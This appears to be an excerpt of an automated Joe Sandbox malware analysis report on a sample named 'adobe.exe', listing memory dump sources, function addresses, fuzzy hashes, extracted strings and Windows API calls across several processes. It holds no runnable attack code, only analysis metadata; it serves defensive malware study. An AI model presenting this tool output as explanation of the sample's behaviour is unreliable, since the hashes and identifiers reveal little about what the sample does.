Source File: 00000005.00000002.1783245105.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_115d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86cbc987cf9a18dbd653e772f3de78900abd603dd72437a53bbfecdb5f9a0833
Instruction ID: 090565055f21db6a2d3d1a67923161cb3952a877bd108445527cc0c0cdcbfda9
Opcode Fuzzy Hash: 86cbc987cf9a18dbd653e772f3de78900abd603dd72437a53bbfecdb5f9a0833
Instruction Fuzzy Hash: 52216B715093C0DFDB07CB64D990B11BF71EB46214F29C5DBD8898B2A7C33A984ACB62

Function 06B74240 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36d974a8f6f898a54c3561626b21a737f85d103c881325b753f1cfebab88dcda
Instruction ID: 4585892480084887640f80446c2f9080beed40b99cbe8afabd2a77ebb51709bb
Opcode Fuzzy Hash: 36d974a8f6f898a54c3561626b21a737f85d103c881325b753f1cfebab88dcda
Instruction Fuzzy Hash: F6012470B245210BCB6596BD9810BABB7DFEBC9721F10846AF11EC7381EE21DC1247E6

Function 06B74008 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5a27431474471e9b31ffcd55d76ec1a1de4e0277a4bbeffd77796a78945e839
Instruction ID: a5ac946c8ba76ea27c74cf8e4a91db04447d8bdbcf103aded01c81a1e5c47782
Opcode Fuzzy Hash: b5a27431474471e9b31ffcd55d76ec1a1de4e0277a4bbeffd77796a78945e839
Instruction Fuzzy Hash: D211AD32B101298FCF54A768D8246AE73EBEBC8211F004179C516E7358EE76DC028BE2

Function 06B7A350 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2dd74a3f5a93b2f34520fa39a75ff8474877b36997284fdd6b709e352e4a131
Instruction ID: e75448d5ae14b058455027ae18de1f4685d88677818ff8e7894ef234dd997810
Opcode Fuzzy Hash: b2dd74a3f5a93b2f34520fa39a75ff8474877b36997284fdd6b709e352e4a131
Instruction Fuzzy Hash: 9201F174B046105FCBA1AA7C9814BAFB7DAEB85710F104569F11AC7351DA21DC0287E1

Function 06B73CC0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7448e6c0d28a37b10ca484738a8e7c9362b832a7cf6b75b9c58017bd85503836
Instruction ID: b9e1239d7cf3367d58351a2d8ccbd7aedde201397f9ababe5de789233e62e428
Opcode Fuzzy Hash: 7448e6c0d28a37b10ca484738a8e7c9362b832a7cf6b75b9c58017bd85503836
Instruction Fuzzy Hash: 2C21F2B1D01659EFCB10CF9AD884ACEFBF8FB48320F10816AE918A7200C374A544CBA5

Function 06B73FF9 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4335f4a28b0e178965b008f35ba1bc918849e4b08ecf059106f65a6dc795d95e
Instruction ID: e8cdb054a9287936d16b58408aef89d49f5eab9d5e6abf637c136f0d5a8a60c2
Opcode Fuzzy Hash: 4335f4a28b0e178965b008f35ba1bc918849e4b08ecf059106f65a6dc795d95e
Instruction Fuzzy Hash: 0701DF72B109294BDF55A66CDC146EF73EBEBC8612F004175D12AE7298EE658C024BE1

Function 06B7F1F8 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d13ee899378b29b5f0c5063bc8a874cb7026a24d1d958aebfd07b965092f165b
Instruction ID: cd08406c90234f315c4a4cbe53f4b97a2ed3108e704f61138f4264b654daef8f
Opcode Fuzzy Hash: d13ee899378b29b5f0c5063bc8a874cb7026a24d1d958aebfd07b965092f165b
Instruction Fuzzy Hash: B2012475B180910BCBA986BC941473E67CACBC9220F1484AEF11ACB350D920CC028799

Function 06B73CC8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89eb63e415fff00f3b294ae1c81ed7995bed57b668b8fdedec636df9d16aff86
Instruction ID: ce7f405aef7908058bf65922da00b6543d0edbf44deb24277b87fe72c6541798
Opcode Fuzzy Hash: 89eb63e415fff00f3b294ae1c81ed7995bed57b668b8fdedec636df9d16aff86
Instruction Fuzzy Hash: 3B11D3B1D01259DFCB00CF9AD884ACEFBF8FB48320F10812AE918A7240C3746544CFA5

Function 06B74250 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c953e4ce3d93557d68c4eec1596eb4d0db39b6ef6688f72fafc9b264b0245c1e
Instruction ID: a7cb67be90680e4f5a566e3db566aa0b967d5fe0664b7ae7e9d1ab426e71a4fe
Opcode Fuzzy Hash: c953e4ce3d93557d68c4eec1596eb4d0db39b6ef6688f72fafc9b264b0245c1e
Instruction Fuzzy Hash: 0B01F470B244120BDB6496BED410B6FB2CBEBC8721F10987AE61FC7784EE61DC024395

Function 06B7F208 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d5c93dee89c9ec476866944597b58ea826f386dd18565b58a91fde99af3eaa5
Instruction ID: 2e90bc29184f72271a9172b2db24e8678763a5e39138913de0a785fdf688fb38
Opcode Fuzzy Hash: 2d5c93dee89c9ec476866944597b58ea826f386dd18565b58a91fde99af3eaa5
Instruction Fuzzy Hash: E4018175B145111BDB6496BD945073EA3DBDBC9620F108469F11AC7354DE21DC024799

Function 06B7A360 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b08d74e380183e6454d44eecfd201f99742a9a0c1e704a9cc94c9948b94e41dd
Instruction ID: c5bcfb5a041adf20e6a1739babdf6a3bc88ddea17f6425859b3fc055465b7021
Opcode Fuzzy Hash: b08d74e380183e6454d44eecfd201f99742a9a0c1e704a9cc94c9948b94e41dd
Instruction Fuzzy Hash: 0E01F474B101158FCBA0EA7DD454B2EB3DAFB89714F108468E11BC7354EA21DC028790

Function 06B764B8 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55d76a81762a97a31cbdb09358cceb7924fc4d3f65a69a7e50fced4cc85acb1f
Instruction ID: 583ff8a0bcaa6cd9fc5b7a283b38986857f11309a505065ac1f22a950a71bfc9
Opcode Fuzzy Hash: 55d76a81762a97a31cbdb09358cceb7924fc4d3f65a69a7e50fced4cc85acb1f
Instruction Fuzzy Hash: 34E092B1E18648AFDF60DAB0995564A7B6DDB02204F1044F5E414D7142E275CE019792

Non-executed Functions

Function 06B776E8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$eq, xrefs: 06B77C71
$eq, xrefs: 06B77C5B
$eq, xrefs: 06B77C4F
$eq, xrefs: 06B77BBC
$eq, xrefs: 06B777FF
$eq, xrefs: 06B777F3
$eq, xrefs: 06B77BB0
$eq, xrefs: 06B77824
$eq, xrefs: 06B77C65
$eq, xrefs: 06B77830

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-2049195972
Opcode ID: a837945ac32626fcdce9892fd2cdc6e87df1cac3bb03d4468a603c9776028e49
Instruction ID: 36c90a48f5071e0d22d7477e92bfae4ce7658ce310d1bbb7d96005216a219fbe
Opcode Fuzzy Hash: a837945ac32626fcdce9892fd2cdc6e87df1cac3bb03d4468a603c9776028e49
Instruction Fuzzy Hash: 65121B70A01219CFDB64DF79C954A9EB7B2FF89304F2085A9D41AAB264EF319D45CF80

Function 06B7A980 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$eq, xrefs: 06B7AAFC
$eq, xrefs: 06B7AB08
$eq, xrefs: 06B7AA82
$eq, xrefs: 06B7AA76
$eq, xrefs: 06B7AB32
$eq, xrefs: 06B7AB3E
$eq, xrefs: 06B7AADD
$eq, xrefs: 06B7AAD1

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-1110479544
Opcode ID: 890ccac2503672819cd3f3f5bd2366d34d1056c1ce826d00be418a7315d17f4d
Instruction ID: 86bfdade4c88a776c3dba16b00d67fb7ee3591b78134e433b6a47b2805a6c3aa
Opcode Fuzzy Hash: 890ccac2503672819cd3f3f5bd2366d34d1056c1ce826d00be418a7315d17f4d
Instruction Fuzzy Hash: D49184B0A0020ADFDBA8DF79D954B6E7BB2FF44305F108569E412AB394DB759C41CB90

Function 06B770E8 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$eq, xrefs: 06B773CA
$eq, xrefs: 06B775F0
$eq, xrefs: 06B77584
$eq, xrefs: 06B775FC
.5}q, xrefs: 06B77143
$eq, xrefs: 06B77424
$eq, xrefs: 06B77430

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID: .5}q$$eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-1622854337
Opcode ID: fff2c74a920d9f24a263f114acb78397db3c3209141d0a19b5328f276456ede8
Instruction ID: 65e8491a2cf830b3cff7ad6117f9ca9452034c49f448030d9292a920ca9b60df
Opcode Fuzzy Hash: fff2c74a920d9f24a263f114acb78397db3c3209141d0a19b5328f276456ede8
Instruction Fuzzy Hash: 5DF11974A00209CFDB59EF79D554A6EBBB2FF84304F2485A8D8159B398DB35EC42CB90

Function 06B78418 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$eq, xrefs: 06B7867E
$eq, xrefs: 06B78672
$eq, xrefs: 06B786E3
$eq, xrefs: 06B786D7

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq
API String ID: 0-812946093
Opcode ID: 70c3ff21bd016c740cb21f7127a8404ea40059e112358b572e21da04c127a5a5
Instruction ID: c3670ee71b40d3319535b912f39c4aa7d1a31ffd7f753121c470fa25795ba0b2
Opcode Fuzzy Hash: 70c3ff21bd016c740cb21f7127a8404ea40059e112358b572e21da04c127a5a5
Instruction Fuzzy Hash: 26B13970A102198FDB58EF79D5946AEB7B2FF84304F248479D416AB394DB75DC82CB80

Function 06B7AD08 Relevance: 5.2, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

$eq, xrefs: 06B7AEBB
$eq, xrefs: 06B7AE39
$eq, xrefs: 06B7AEE4
$eq, xrefs: 06B7AE8C

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq
API String ID: 0-812946093
Opcode ID: 9a19fcf379bf1eacdaca1420708b89c816217bf0d8f14a4c9e5a04d352978df7
Instruction ID: 5c3e0ac175c64fdc48b7d34f5a45a5ffd3abe4e494ef40e526dcd5fa032a4f41
Opcode Fuzzy Hash: 9a19fcf379bf1eacdaca1420708b89c816217bf0d8f14a4c9e5a04d352978df7
Instruction Fuzzy Hash: 4B51A1B4A102099FDFE5DB68D9806AEB7B2FB44301F2455A9E826EB244DB31DC41CB91

Function 06B78830 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$eq, xrefs: 06B788AF
LReq, xrefs: 06B78923
LReq, xrefs: 06B78972
$eq, xrefs: 06B788BB

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID: LReq$LReq$$eq$$eq
API String ID: 0-731573373
Opcode ID: 363acc651dfdc5c57f9e0a562c4a7d0039dcb993856ee9e09e4cd4fff264a71c
Instruction ID: c9e295e9c5058290592c201692e41ecf2006c8c062a8360d96b5e01eceac1183
Opcode Fuzzy Hash: 363acc651dfdc5c57f9e0a562c4a7d0039dcb993856ee9e09e4cd4fff264a71c
Instruction Fuzzy Hash: 9951A570B002068FDB58DF39D954A6A77E2FF88304F1486A9E526DB399DB31EC41CB91

Analysis Process: adobe.exePID: 6284, Parent PID: 2592COMMON

Execution Graph

Execution Coverage:	8.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	73
Total number of Limit Nodes:	7

Executed Functions

Function 0100D330 Relevance: 6.1, APIs: 4, Instructions: 135
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0100D3BE
GetCurrentThread.KERNEL32 ref: 0100D3FB
GetCurrentProcess.KERNEL32 ref: 0100D438
GetCurrentThreadId.KERNEL32 ref: 0100D491

Memory Dump Source

Source File: 00000007.00000002.1784056442.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1000000_adobe.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 2e42cf62acbb3ce9b6554c82b6341496f67bef307c59d1216d6bc6faeee19d72
Instruction ID: f6ad7150e366a359a3f83449df09120fd0ce4c92d227187e111c7d6eab87ceef
Opcode Fuzzy Hash: 2e42cf62acbb3ce9b6554c82b6341496f67bef307c59d1216d6bc6faeee19d72
Instruction Fuzzy Hash: 495175B0900649CFEB54CFAAD448B9EBFF1EF48314F24C45AE049A72A1DB35A944CB61

Function 0100D340 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0100D3BE
GetCurrentThread.KERNEL32 ref: 0100D3FB
GetCurrentProcess.KERNEL32 ref: 0100D438
GetCurrentThreadId.KERNEL32 ref: 0100D491

Memory Dump Source

Source File: 00000007.00000002.1784056442.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1000000_adobe.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: f0c96db762e2e71d717c84175c12edf6ae27331a099a6f1c42a69948ca1cdb9d
Instruction ID: d17e28f8374364646f2d052dc290ec0a657fb0649a90b3b967c9dd9719472c82
Opcode Fuzzy Hash: f0c96db762e2e71d717c84175c12edf6ae27331a099a6f1c42a69948ca1cdb9d
Instruction Fuzzy Hash: 0C5173B0900649CFEB54CFAAD448B9EBFF1EF88314F20C459E449A72A0DB35A940CB61

Function 0100B0B0 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0100B306

Memory Dump Source

Source File: 00000007.00000002.1784056442.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1000000_adobe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4105f9d48f34228eeafe8a5711aea93ae8adfb6dbf33fce54fb6281e81c9b9a1
Instruction ID: 86f6c65feb51e682e7808049203f3897d30fdf6cf22516dc1aac23b654abbd4d
Opcode Fuzzy Hash: 4105f9d48f34228eeafe8a5711aea93ae8adfb6dbf33fce54fb6281e81c9b9a1
Instruction Fuzzy Hash: 74715370A00B058FE765DF6AD44079ABBF5FF88300F00892DD49ADBA80DB75E845CB90

Function 0100590D Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 010059C9

Memory Dump Source

Source File: 00000007.00000002.1784056442.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1000000_adobe.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a8d8c1f9100c8398d9fab687b6e2b142ef77cdbb2155539ffb2da25516dd38a8
Instruction ID: e188b7f026cae9f3d15d95629dfae751c9ed445b75de3751f7dd8a4c8747d6db
Opcode Fuzzy Hash: a8d8c1f9100c8398d9fab687b6e2b142ef77cdbb2155539ffb2da25516dd38a8
Instruction Fuzzy Hash: 0741F2B0C0071DCEDB24CFA9C885A9EBBF5FF49304F24816AD449AB251DB756946CF50

Function 01004248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 010059C9

Memory Dump Source

Source File: 00000007.00000002.1784056442.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1000000_adobe.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d2c10fcb40de318eb5a2da998017121dde6fe2e4e9fa782e16747e2101a36772
Instruction ID: 60917ff7c122688472ad4d1ed759cbe1cc0ca8c2d647818037cecb89cb92140c
Opcode Fuzzy Hash: d2c10fcb40de318eb5a2da998017121dde6fe2e4e9fa782e16747e2101a36772
Instruction Fuzzy Hash: F341D0B0C0071DCEEB24CFAAC885A9DBBF6FF49304F64805AD449AB251DB756945CF90

Function 0100D580 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0100D60F

Memory Dump Source

Source File: 00000007.00000002.1784056442.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1000000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: cf96a6653eca2d1d233348f696fd4d75a67e1d8227f43434c9edcf9a332d3499
Instruction ID: d325b8a5a6ec250d3e9aefdda0125509f10dfe03146f15e0f2796822df3099d7
Opcode Fuzzy Hash: cf96a6653eca2d1d233348f696fd4d75a67e1d8227f43434c9edcf9a332d3499
Instruction Fuzzy Hash: E321E5B5D00248DFDB10CF9AD884ADEBBF8EB48324F14845AE958A3350D375A950CF65

Function 0100D588 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0100D60F

Memory Dump Source

Source File: 00000007.00000002.1784056442.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1000000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c9b6eb707a465fc9935b9d6421c734ec6a2306db53d2df563f9b0080aef3f9b7
Instruction ID: 0a21fab6103d6e10d7f34cb82bb291a76711a46ea339f81830cf8a6c0a72d404
Opcode Fuzzy Hash: c9b6eb707a465fc9935b9d6421c734ec6a2306db53d2df563f9b0080aef3f9b7
Instruction Fuzzy Hash: 5021E4B5900248DFDB10CF9AD884ADEFFF8EB48320F14845AE918A3350D379A950CF65

Function 0100B2A0 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0100B306

Memory Dump Source

Source File: 00000007.00000002.1784056442.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1000000_adobe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 15914a1d20603ae0bb731afb8bbb9d51aa1a90e5ade2db046ac9268dd37cf3e3
Instruction ID: 0dd86e5e6d6605161426d368b16478744b62ecb3fe91c30cefb770959bf0bf74
Opcode Fuzzy Hash: 15914a1d20603ae0bb731afb8bbb9d51aa1a90e5ade2db046ac9268dd37cf3e3
Instruction Fuzzy Hash: F2110FB5C006498FDB20DF9AC444A9EFBF8EF88220F14845AD969A7240C379A545CFA5

Function 00E0D1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1783462838.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e0d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d8eb000420450d09ab7819fd65e8641f89620883d617f08c38bb9a1a8fa0235
Instruction ID: 94836ec2e61f5492fad96f487a5e44b27a9e3456ac3f5d372fd929adafa79757
Opcode Fuzzy Hash: 9d8eb000420450d09ab7819fd65e8641f89620883d617f08c38bb9a1a8fa0235
Instruction Fuzzy Hash: 78212871508240DFDB05DF94DCC0B26BFA5FB98314F24C569ED091B2A6C336D856CBA1

Function 00E0D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1783462838.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e0d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56a71253b5b5fabcd89216353b7d27df880c13efa4eee79e6dc3fb7c7d3228d4
Instruction ID: 389d1faf898f8a76e11acd494513d0cd672107dac97b8b036daab9a7b1ed3b6a
Opcode Fuzzy Hash: 56a71253b5b5fabcd89216353b7d27df880c13efa4eee79e6dc3fb7c7d3228d4
Instruction Fuzzy Hash: A42148B1508204DFDB00DF84CDC0B26BF65FB98324F24C569E9095B286C336E896C7A2

Function 00E1D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1783545696.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e1d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e16473fd43e26cefe245ae700965c967c16f29f14380d3a8a97f10855c5a32a3
Instruction ID: 5d33a662f65d2abbc82695b52e4bf485d59ebeace975c84377927c5bdf1e57e2
Opcode Fuzzy Hash: e16473fd43e26cefe245ae700965c967c16f29f14380d3a8a97f10855c5a32a3
Instruction Fuzzy Hash: 1721F575508240DFDB14DF14D980B56BBA6FB8C314F24C56DD90A5B286C33AD887CA61

Function 00E1D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1783545696.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e1d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f4420e58efb60f59eb25001261a3b34cb17697df1d7e81d2c663cac4584c9e7
Instruction ID: 673701c4b8271792c17f749ae7c498457bb31fb093f83c320dc7b557802c618a
Opcode Fuzzy Hash: 5f4420e58efb60f59eb25001261a3b34cb17697df1d7e81d2c663cac4584c9e7
Instruction Fuzzy Hash: 6121837550D3C08FD712CF24D990755BF71EB46314F28C5DAD8498B2A7C33A984ACB62

Function 00E0D1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1783462838.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e0d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 083a0aad303073c06da1a146aa343d8be4e7eaa9cc126e7cc12db35873612b5c
Instruction ID: 865ad6974262ea1031eea59a478f55a9f1ee9808d14fdb3e4a3f57135dc977f5
Opcode Fuzzy Hash: 083a0aad303073c06da1a146aa343d8be4e7eaa9cc126e7cc12db35873612b5c
Instruction Fuzzy Hash: 5C21E476404240CFDB06CF40D9C4B16BF71FB84314F24C1A9DD480B266C33AD466CB91

Function 00E0D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1783462838.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e0d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
Instruction ID: 7d276b74fb92f9bab72f245f36f80e66b4c1839917bf23e63c1053f0cb96d0ea
Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
Instruction Fuzzy Hash: B1112672404280CFDB12CF44D9C0B16BF71FB94324F24C2A9D9094B256C33AE85ACBA1

Analysis Process: adobe.exePID: 3000, Parent PID: 6284COMMON

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	27
Total number of Limit Nodes:	6

Executed Functions

Function 066F34A8 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 066F3BDC
$eq, xrefs: 066F3BB3
$eq, xrefs: 066F3BD0
$eq, xrefs: 066F3C00
$eq, xrefs: 066F3BA7
$eq, xrefs: 066F3BF4

Memory Dump Source

Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-220072568
